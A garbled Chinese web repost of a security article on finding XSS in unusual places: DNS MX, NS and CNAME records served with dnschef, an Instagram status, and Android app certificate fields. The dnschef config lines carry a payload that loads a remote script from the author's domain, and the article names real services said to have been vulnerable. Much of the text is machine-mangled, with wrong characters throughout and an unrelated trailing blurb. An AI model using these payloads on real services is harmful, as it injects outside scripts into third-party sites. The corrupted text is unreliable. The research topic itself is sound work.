在这篇文┞仿中,我预备跟大年夜家评论辩论几种不合的场景,在这些场景中,不合的办事都邑收集各类各样的数据,但它们又无法精确地去处理这些数据。在某些情况下,数据采取的是安然格局存储和传输的,然则因为数据的解析操作以及进一步处理的过程中存在安然问题,将导致无害的字符串变成进击向量。
XSS和DNS
如不雅你在搜刮引擎中搜刮“经由过程DNS实现XSS”(XSS via DNS)的相干话题,你将会看到类似【参考材料一】和【参考材料二】这种介绍如安在TXT记录中传递XSS进击向量的文┞仿。然则为什么没有人推敲过其他类型的记录呢?比如说CNAME或NS之类的。因为如不雅你想把域名作为一个进击向量的话,你还须要创建本身的NS办事器。
也许应用DNSCHEF会是一个好主意。
我应用的阁下名是hack.bo0om.ru(任何阁下名都可以),并且将我的IP设置成了该域名的NS办事器。接下来修改dnschef.ini并完成dnschef的设备,添加下列记录:
- [MX]
- *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>
- [NS]
- *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>
- [CNAME]
- *.xss.hack.bo0om.ru="-->'><script/src=//bo0om.ru/xss.js>
如不雅某个在线办事获得了DNS数据之后还将它们打印在了屏幕上,只能解释该办事忘记过滤掉履┞封些数据了。
下面是一些存在XSS马脚的例子:
- · who.is
- · robtex.com
- · dnsqueries.com
- · etc
有一次我只是为了好玩,然后将一段XSS Payload添加到了我Instagram的小我状况中。一开端没产生什么竽暌剐趣的事,并且这个XSS Payload也是没有进击性的。
然则之后我发明,这个XSS Payload竟然在别的的域名和在线办事中起感化了,大年夜我的Web办事器日记记录来看,这些域名貌似指向的是社交收集解析器和一些分析办事。下面给出的是个中部分示例:
- · findgram.me
- · imgrab.com
- · instagy.com
- · iconosquare.com
- · tofo.me
- · photo.sh
- · gramosphere.com
不过个中有一部分已经修复了这个马脚。
XSS和Google Play
比来,@Black2Fan给我发了一条信息,并问我能不克不及够在Google Play应用市廛上传存在XSS马脚的Android App。我当时都不知道竟然还有这种操作!但我感到可行。于是我本身弄了一个App,然后为这个App生成了一个证书,并将个中的开辟者名称和其他数据用XSS向量进行了调换。
推荐阅读
1. MCM让发卖全身心投入营业晃荡和售点治理 CIO须要肩负制订公司信息化计谋、引领信息化实践的任务,如没有好奇心,不克不及时刻洞察瞬息万变的新模式、新技巧、新科技、新实践,就无法为企>>>详细阅读
本文标题:我们要在任何可能的地方测试XSS漏洞
地址:http://www.17bianji.com/lsqh/36629.html
1/2 1